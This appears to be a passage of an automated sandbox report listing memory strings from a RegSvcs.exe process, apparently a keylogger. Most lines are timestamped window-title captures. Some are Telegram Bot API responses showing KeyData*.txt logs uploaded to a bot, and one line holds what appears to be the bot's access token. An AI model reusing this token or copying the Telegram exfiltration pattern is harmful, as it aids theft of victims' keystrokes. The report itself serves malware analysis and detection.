                    Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":193,"from":{"id":7879240328,"is_bot":true,"first_name":"ugobest147","username":"ugobest147bot"},"chat":{"id":2001212894,"first_name":"Joe","last_name":"Joe","type":"private"},"date":1741385655,"document":{"file_name":"KeyDataHqyQZWUg.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAPBZ8tvt28JvsljNQogKF_0Gka8n08AAmgdAAKHvmBSPo8RcXLXI1M2BA","file_unique_id":"AgADaB0AAoe-YFI","file_size":2145},"caption":"DC-KL:::user-PC\\user\\"}}11]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, KeyDataWrlJLqwI.txt.12.drBinary or memory string: [17:14:38]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561065665.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:55]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:34]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:17]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:56]<<Program Manager_id":"AgADfR0AAoe-YFI","file_size":396},"caption":"DC-KL:::user-PC\\user\\"}}rogram Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: S-PC\user\4:52]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:11]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:43]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:58]<<Program Manager>>a
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:38]<<Program Manager>>z
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, KeyDatarFwERdwA.txt.12.drBinary or memory string: [17:14:45]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--0]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:55<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:01]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:44]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDataFCXylbPs.txt.12.drBinary or memory string: [17:14:28]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:06<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:27]<<Program Manager>>
                    Source: KeyDataWNjCpCvy.txt.12.drBinary or memory string: [17:14:36]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:20]<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:53]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\dRegProv
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:52]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:58]<<Program Manager
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:26]<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:08]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :14:39]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:37]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:59]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:51]<<Program Manager>>O
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:36]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:58]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3Program Manager>>
                    Source: KeyDataWNjCpCvy.txt.12.drBinary or memory string: [17:14:35]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4f5-b1ed-4060-99b9-fca7ff59c113--05]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:56Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:47]<<Program Manager>
                    Source: KeyDataqQPWdZsp.txt.12.drBinary or memory string: [17:14:13]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 59c113--f5-b1ed-4060-99b9-fca7ff59c113--f5-b1ed-4060-99b9-fca7ff59c113--:06]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:46]<<Program Manager>>
                    Source: KeyDataWNjCpCvy.txt.12.drBinary or memory string: [17:14:34]<<Program Manager>>
                    Source: KeyDataqQPWdZsp.txt.12.drBinary or memory string: [17:14:12]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:57]<<Program Manager>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--00]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:48]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:53]<<Program Manager>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:38]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 17:13:52]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:47]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:10]<<Program Manager>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:11]<<Program Manager>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\lfons\ocument
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGawProgram Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:24]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--52]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:15]<<Program Manager
                    Source: KeyDatahOJefols.txt.12.drBinary or memory string: [17:14:49]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:23]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"ok":true,"result":{"message_id":219,"from":{"id":7879240328,"is_bot":true,"first_name":"ugobest147","username":"ugobest147bot"},"chat":{"id":2001212894,"first_name":"Joe","last_name":"Joe","type":"private"},"date":1741385696,"document":{"file_name":"KeyDatabcwuTujf.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAPbZ8tv4JV1vzE0d3xr9EjmceS6UpgAAoIdAAKHvmBSrSlKCy7JjL02BA","file_unique_id":"AgADgh0AAoe-YFI","file_size":396},"caption":"DC-KeyDatabcwuTujf.txt:::user-PC\\user\\"}}7:13:37]<<Program Manager>>
                    Source: KeyDatagbqSMHst.txt.12.drBinary or memory string: [17:14:33]<<Program Manager>>
                    Source: KeyDataUxuffJyW.txt.12.drBinary or memory string: [17:14:16]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDatagbqSMHst.txt.12.drBinary or memory string: [17:14:32]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:23]<<Program Manager>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:57]<<Program Manager>>lfons\,
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:50]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, KeyDataUxuffJyW.txt.12.drBinary or memory string: [17:14:15]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:39]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:56]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:40]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:02]<<Program Manager>>5
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :13:42]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 24]<<Program Managernagp
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:22]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--5]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:28]<<Program ManagerE
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\donsdDocumentSU
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:21]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:02]<<Program Manager
                    Source: KeyDataJJZysHpj.txt.12.drBinary or memory string: [17:14:31]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:57]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, KeyDataUxuffJyW.txt.12.drBinary or memory string: [17:14:14]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:33]<<Program Manager>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:39]<<Program Manager9
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp, KeyDataJJZysHpj.txt.12.drBinary or memory string: [17:14:30]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\lfons\te
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:52]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:14:00]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--37]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:32]..Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:20]<<Program Manager
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:36]<<Program Manager>>F
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:43]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:29]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:07]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]<<Program Manager>>l: no-cache
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:53]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:31]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:20<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:58]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--8]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:09]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managertxtfons\7<
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:55]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:55]<<Program Manager>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :13:36]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:39]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:33]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, KeyDatawKBOyTqv.txt.12.drBinary or memory string: [17:14:17]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:29]<<Program Manager>I
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD RfComm [Bluetooth]13:32]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDataRbTCErLX.txt.12.drBinary or memory string: [17:14:42]<<Program Manager>>
